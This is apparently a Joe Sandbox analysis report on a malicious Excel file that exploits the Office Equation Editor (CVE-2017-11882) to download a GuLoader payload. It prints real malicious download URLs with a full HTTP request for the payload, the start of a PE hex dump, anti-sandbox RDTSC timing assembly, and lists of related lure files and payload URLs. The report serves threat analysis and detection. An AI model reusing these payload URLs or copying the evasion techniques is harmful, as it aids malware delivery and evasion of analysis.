
Analysis Report MKDRPSJS9E999494993.xlsx

Overview

General Information

Sample Name: MKDRPSJS9E999494993.xlsx
Analysis ID: 378980
MD5: 1a40446f940b183d3d94f0e31fc8560d
SHA1: 5db0c0c8d1e079b5a2d5bc2858a55ff4498c3fb3
SHA256: adfefd8b289eecc823dc6d2b2f9acf6e5a4e49db2917af74d34354ac867c3235
Tags: VelvetSweatshop, xlsx

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected GuLoader
Drops PE files to the user root directory
Machine Learning detection for dropped file
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Yara detected VB6 Downloader Generic
Abnormal high CPU Usage
Allocates a big amount of memory (probably used for heap spraying)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Connects to a URL shortener service
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 920 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2536 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2692 cmdline: 'C:\Users\Public\vbc.exe' MD5: 6CC6D1DD6CDD848693426A270563C921)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
Process Memory Space: vbc.exe PID: 2692 | JoeSecurity_VB6DownloaderGeneric | Yara detected VB6 Downloader Generic | Joe Security |
Process Memory Space: vbc.exe PID: 2692 | JoeSecurity_GuLoader | Yara detected GuLoader | Joe Security |

Sigma Overview

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882
Source: Process started | Author: Florian Roth | Data: Command: 'C:\Users\Public\vbc.exe', CommandLine: 'C:\Users\Public\vbc.exe', CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2536, ProcessCommandLine: 'C:\Users\Public\vbc.exe', ProcessId: 2692
Sigma detected: EQNEDT32.EXE connecting to internet
Source: Network Connection | Author: Joe Security | Data: DestinationIp: 103.141.138.118, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2536, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49166
Sigma detected: File Dropped By EQNEDT32EXE
Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2536, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\svchost[1].exe
Sigma detected: Executables Started in Suspicious Folder
Source: Process started | Author: Florian Roth | Data: same process-start event (vbc.exe PID 2692 spawned by EQNEDT32.EXE PID 2536) as for 'Droppers Exploiting CVE-2017-11882' above
Sigma detected: Execution in Non-Executable Folder
Source: Process started | Author: Florian Roth | Data: same process-start event as above
Sigma detected: Suspicious Program Location Process Starts
Source: Process started | Author: Florian Roth | Data: same process-start event as above

      Signature Overview


AV Detection:

Antivirus detection for URL or domain
Source: http://stdyworkfinetraistfh.dns.army/findoc/svchost.exe | Avira URL Cloud: Label: malware
Multi AV Scanner detection for submitted file
Source: MKDRPSJS9E999494993.xlsx | ReversingLabs: Detection: 31%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\svchost[1].exe | Joe Sandbox ML: detected
Source: C:\Users\Public\vbc.exe | Joe Sandbox ML: detected

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe
Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: unknown | HTTPS traffic detected: 172.67.83.132:443 -> 192.168.2.22:49165 version: TLS 1.2
Source: excel.exe | Memory has grown: Private usage: 4MB later: 72MB
Source: global traffic | DNS query: name: is.gd
Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 172.67.83.132:443

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2022550 ET TROJAN Possible Malicious Macro DL EXE Feb 2016 192.168.2.22:49166 -> 103.141.138.118:80
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | DNS query: name: is.gd
Source: global traffic | HTTP traffic detected:
HTTP/1.1 200 OK
Date: Wed, 31 Mar 2021 10:05:14 GMT
Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/8.0.0
Last-Modified: Wed, 31 Mar 2021 00:01:16 GMT
ETag: "12000-5bec9d05b2f1c"
Accept-Ranges: bytes
Content-Length: 73728
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload
Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 75 9f f9 db 31 fe 97 88 31 fe 97 88 31 fe 97 88 b2 e2 99 88 30 fe 97 88 7e dc 9e 88 30 fe 97 88 07 d8 9a 88 30 fe 97 88 52 69 63 68 31 fe 97 88 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 78 16 0d 50 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 f0 00 00 00 20 00 00 00 00 00 00 08 12 00 00 00 10 00 00 00 00 01 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 06 00 06 00 04 00 00 00 00 00 00 00 00 20 01 00 00 10 00 00 a9 f5 01 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 44 ee 00 00 28 00 00 00 00 10 01 00 88 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b0 e1 00 00 00 10 00 00 00 f0 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 18 0a 00 00 00 00 01 00 00 10 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 88 09 00 00 00 10 01 00 00 10 00 00 00 10 01 00 00 00 00 00 00 00 00 00 
00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: Joe Sandbox View | IP Address: 172.67.83.132
Source: Joe Sandbox View | IP Address: 103.141.138.118
Source: Joe Sandbox View | ASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
Source: Joe Sandbox View | JA3 fingerprint: 36f7277af969a6947a61ae0b815907a1
Source: global traffic | HTTP traffic detected:
GET /findoc/svchost.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Connection: Keep-Alive
Host: stdyworkfinetraistfh.dns.army
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E3F1BB40.emf
Source: unknown | DNS traffic detected: queries for: is.gd
Source: vbc.exe, 00000004.00000002.2383679135.0000000003167000.00000002.00000001.sdmp | String found in binary or memory: http://localizability/practices/XML.asp
Source: vbc.exe, 00000004.00000002.2383679135.0000000003167000.00000002.00000001.sdmp | String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: vbc.exe, 00000004.00000002.2383679135.0000000003167000.00000002.00000001.sdmp | String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: vbc.exe, 00000004.00000002.2383679135.0000000003167000.00000002.00000001.sdmp | String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: vbc.exe, 00000004.00000002.2383679135.0000000003167000.00000002.00000001.sdmp | String found in binary or memory: http://www.icra.org/vocabulary/.
Source: unknown | Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49165
Source: unknown | HTTPS traffic detected: 172.67.83.132:443 -> 192.168.2.22:49165 version: TLS 1.2

System Summary:

Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\svchost[1].exe
Source: C:\Users\Public\vbc.exe | Process Stats: CPU usage > 98%
Source: C:\Users\Public\vbc.exe | Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\Public\vbc.exe | Memory allocated: 76D20000 page execute and read and write
Source: MKDRPSJS9E999494993.xlsx | OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: svchost[1].exe.2.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.2.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: classification engine | Classification label: mal100.troj.expl.evad.winXLSX@4/25@3/2
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Desktop\~$MKDRPSJS9E999494993.xlsx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVR34A.tmp
Source: C:\Users\Public\vbc.exe | Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts (3 times)
Source: MKDRPSJS9E999494993.xlsx | ReversingLabs: Detection: 31%
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: MKDRPSJS9E999494993.xlsx | Static file information: File size 2663936 > 1048576
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: MKDRPSJS9E999494993.xlsx | Initial sample: OLE indicators vbamacros = False
Source: MKDRPSJS9E999494993.xlsx | Initial sample: OLE indicators encrypted = True

Data Obfuscation:

Yara detected GuLoader
Source: Yara match | File source: Process Memory Space: vbc.exe PID: 2692, type: MEMORY
Yara detected VB6 Downloader Generic
Source: Yara match | File source: Process Memory Space: vbc.exe PID: 2692, type: MEMORY
Source: C:\Users\Public\vbc.exe | Code function: 4_2_0040E754 push dword ptr [ebp+18h]; ret 4_2_0040ED2F
Source: C:\Users\Public\vbc.exe | Code function: 4_2_00406754 push esp; iretd 4_2_00406755
Source: C:\Users\Public\vbc.exe | Code function: 4_2_00404953 push dword ptr [ebp+18h]; ret 4_2_0040ED2F
Source: C:\Users\Public\vbc.exe | Code function: 4_2_00404CDC push es; ret 4_2_00404CDE
Source: C:\Users\Public\vbc.exe | Code function: 4_2_003D60E3 push edi; retf 4_2_003D60E4
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\svchost[1].exe

Boot Survival:

Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX (12 times)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX (8 times)
Source: C:\Users\Public\vbc.exe | Process information set: NOOPENFILEERRORBOX (3 times)
Source: MKDRPSJS9E999494993.xlsx | Stream path 'EncryptedPackage' entropy: 7.99992439687 (max. 8.0)

Malware Analysis System Evasion:

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: vbc.exe, 00000004.00000002.2379236781.00000000003D0000.00000040.00000001.sdmp | Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE9
Source: vbc.exe | Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\Public\vbc.exe | RDTSC instruction interceptor: First address: 00000000003D84DB second address: 00000000003D84DB instructions:
0x00000000 rdtsc
0x00000002 xor eax, eax
0x00000004 inc eax
0x00000005 cpuid
0x00000007 popad
0x00000008 call 00007F650CADF228h
0x0000000d lfence
0x00000010 mov edx, dword ptr [7FFE0014h]
0x00000016 lfence
0x00000019 ret
0x0000001a sub edx, esi
0x0000001c ret
0x0000001d add edi, edx
0x0000001f dec dword ptr [ebp+000000F8h]
0x00000025 cmp dword ptr [ebp+000000F8h], 00000000h
0x0000002c jne 00007F650CADF1A9h
0x0000002e jmp 00007F650CADF21Eh
0x00000030 test di, 57D1h
0x00000035 call 00007F650CADF280h
0x0000003a call 00007F650CADF238h
0x0000003f lfence
0x00000042 mov edx, dword ptr [7FFE0014h]
0x00000048 lfence
0x0000004b ret
0x0000004c mov esi, edx
0x0000004e pushad
0x0000004f rdtsc
Source: C:\Users\Public\vbc.exe | Code function: 4_2_003D3425 rdtsc 4_2_003D3425
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2544 | Thread sleep time: -300000s >= -30000s
Source: vbc.exe, 00000004.00000002.2379236781.00000000003D0000.00000040.00000001.sdmp | Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe9
Source: vbc.exe | Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\Public\vbc.exe | Code function: 4_2_003D3039 mov eax, dword ptr fs:[00000030h] 4_2_003D3039
Source: C:\Users\Public\vbc.exe | Code function: 4_2_003D2829 mov eax, dword ptr fs:[00000030h] 4_2_003D2829
Source: C:\Users\Public\vbc.exe | Code function: 4_2_003D46B6 mov eax, dword ptr fs:[00000030h] 4_2_003D46B6
Source: C:\Users\Public\vbc.exe | Code function: 4_2_003D33AE mov eax, dword ptr fs:[00000030h] 4_2_003D33AE
Source: C:\Users\Public\vbc.exe | Code function: 4_2_003D6D88 mov eax, dword ptr fs:[00000030h] 4_2_003D6D88
Source: C:\Users\Public\vbc.exe | Code function: 4_2_003D33E1 mov eax, dword ptr fs:[00000030h] 4_2_003D33E1
Source: C:\Users\Public\vbc.exe | Code function: 4_2_003D7BC8 mov eax, dword ptr fs:[00000030h] 4_2_003D7BC8
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: vbc.exe, 00000004.00000002.2379363125.0000000000A00000.00000002.00000001.sdmp | Binary or memory string: Program Manager
Source: vbc.exe, 00000004.00000002.2379363125.0000000000A00000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000004.00000002.2379363125.0000000000A00000.00000002.00000001.sdmp | Binary or memory string: !Progman
Source: C:\Users\Public\vbc.exe | Queries volume information: C:\ VolumeInformation

Mitre Att&ck Matrix

(numbers in parentheses are the report's signature counts for that technique)

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Spearphishing Link (1) | Exploitation for Client Execution (13) | Path Interception | Process Injection (12) | Masquerading (111) | OS Credential Dumping | Security Software Discovery (211) | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Encrypted Channel (2) | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Extra Window Memory Injection (1) | Virtualization/Sandbox Evasion (1) | LSASS Memory | Virtualization/Sandbox Evasion (1) | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer (12) | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection (12) | Security Account Manager | Process Discovery (1) | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol (2) | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information (11) | NTDS | Remote System Discovery (1) | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol (23) | SIM Card Swap | Carrier Billing Fraud |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Extra Window Memory Injection (1) | LSA Secrets | File and Directory Discovery (1) | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Steganography | Cached Domain Credentials | System Information Discovery (112) | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |

Behavior Graph

(behavior graph image not reproduced; its legend marks processes, signatures, created files, DNS/IP info, dropped files, Windows processes, counts of created registry values and files, binary language (Visual Basic, Delphi, Java, .Net C# or VB.NET, C/C++ or other), malicious nodes and Internet nodes)

Screenshots

(screenshot thumbnails not reproduced)

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label | Link
MKDRPSJS9E999494993.xlsx | 32% | ReversingLabs | Document-Office.Exploit.Heuristic |

Dropped Files

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\svchost[1].exe | 100% | Joe Sandbox ML | |
C:\Users\Public\vbc.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\svchost[1].exe | 6% | ReversingLabs | Win32.Trojan.Generic |
C:\Users\Public\vbc.exe | 6% | ReversingLabs | Win32.Trojan.Generic |

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source | Detection | Scanner | Label | Link
http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe |
http://stdyworkfinetraistfh.dns.army/findoc/svchost.exe | 100% | Avira URL Cloud | malware |
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe |

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
is.gd | 104.25.234.53 | true | false | | high
stdyworkfinetraistfh.dns.army | 103.141.138.118 | true | true | | unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://stdyworkfinetraistfh.dns.army/findoc/svchost.exe | true | Avira URL Cloud: malware | unknown

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check | vbc.exe, 00000004.00000002.2383679135.0000000003167000.00000002.00000001.sdmp | false | | high
http://www.icra.org/vocabulary/. | vbc.exe, 00000004.00000002.2383679135.0000000003167000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | vbc.exe, 00000004.00000002.2383679135.0000000003167000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown

Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
172.67.83.132 | unknown | United States | 13335 | CLOUDFLARENETUS | false
103.141.138.118 | stdyworkfinetraistfh.dns.army | Viet Nam | 135905 | VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN | true

General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 378980
Start date: 31.03.2021
Start time: 12:03:50
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 6m 12s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: MKDRPSJS9E999494993.xlsx
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 6
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.expl.evad.winXLSX@4/25@3/2
EGA Information: Failed
HDC Information:
• Successful, ratio: 5.6% (good quality ratio 2.8%)
• Quality average: 30.1%
• Quality standard deviation: 33.2%
HCA Information: Failed
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .xlsx
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
Warnings:
• Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe
• Report size getting too big, too many NtCreateFile calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• VT rate limit hit for: /opt/package/joesandbox/database/analysis/378980/sample/MKDRPSJS9E999494993.xlsx

The svchost.exe whitelist entry refers to the Windows service host; the payload downloaded in this run is also named svchost.exe (see Created / dropped Files), so confirm in the process tree that the exclusion did not hide activity of the dropped copy.

Simulations

Behavior and APIs

Time     | Type            | Description
12:05:13 | API Interceptor | 67x Sleep call for process: EQNEDT32.EXE modified

Joe Sandbox View / Context

IPs

Match           | Associated Sample Name / URL                | Detection | Context
172.67.83.132   | xpy9BhQR3t.xlsx                             | malicious |
                | VSLS PARTICULARS.xlsx                       | malicious |
                | Customer Account Details.docx               | malicious |
                | New Order.xlsx                              | malicious |
                | COAU7229898130.xlsx                         | malicious |
                | MV Sky Marine.xlsx                          | malicious |
                | Vsl Stowage plan _Particulars.xlsx          | malicious |
                | LoadingdocMVSORSI.xlsx                      | malicious |
                | LoadingdocMVSORSI.xlsx                      | malicious |
                | Payment_Advice_REF344266.xlsx               | malicious |
                | New order.xlsx                              | malicious |
                | 310012000016-Proforma invoice.xlsx          | malicious |
                | New Order March.xlsx                        | malicious |
                | Confirm the balance for Quarter 042021.xlsx | malicious |
                | RFQ_MV. VTC PHOENIX.xlsx                    | malicious |
                | Statement Of Account 2021.xlsx              | malicious |
                | Commercial Invoice.xlsx                     | malicious |
                | payment proof.xlsx                          | malicious |
                | RFQ_MVVTCPHOENIX.xlsx                       | malicious |
                | Invoice.xlsx                                | malicious |
103.141.138.118 | Al Rabiah Trade Requirment.xlsx             | malicious | stdyworkfinetraistfh.dns.army/findoc/svchost.exe
                | draft bill VCSC2100266.xlsx                 | malicious | workfinewsdytraistbk.dns.army/findoc/svchost.exe
                | New Order March.xlsx                        | malicious | stdyworkfinetraistmg.dns.army/findoc/svchost.exe
                | March Order 4th.xlsx                        | malicious | thdyworkfinerainball.dns.army/findoc/svchost.exe?platform=hootsuite
                | BC748484HC9484847DCD.xlsx                   | malicious | thdyworkfinerainbows.dns.army/findoc/svchost.exe?platform=hootsuite
                | Order 25th Feb.xlsx                         | malicious | thdyworkfinerainbows.dns.army/findoc/svchost.exe?platform=hootsuite
                | Tyre Order 24th February.xlsx               | malicious | thdyworkfinerainbotm.dns.army/findoc/svchost.exe?platform=hootsuite
                | Booking.xlsx                                | malicious | thdyworkfinerainbotm.dns.army/findoc/svchost.exe?platform=hootsuite
                | 22-2-2021 .xlsx                             | malicious | thdyworkfinerainbotm.dns.army/findoc/svchost.exe
                | 17-02 Requirment.xlsx                       | malicious | workfinestdyrainbost.dns.army/findoc/svchost.exe
                | New-Order Requirment.xlsx                   | malicious | workfinestdyrainbost.dns.army/findoc/svchost.exe
                | Inquiry from Pure fine food Ltd.xlsx        | malicious | workfinestdyrainbost.dns.army/findoc/svchost.exe
                | Debtor_Statement.xlsx                       | malicious | workfinestdyrainbost.dns.army/findoc/svchost.exe
                | Order 34.xlsx                               | malicious | wsdyworkfinerainbows.dns.army/receipwt/svchost.exe
                | 3rd February Order Request.xlsx             | malicious | workfinestdyrainbost.dns.army/receipwt/svchost.exe
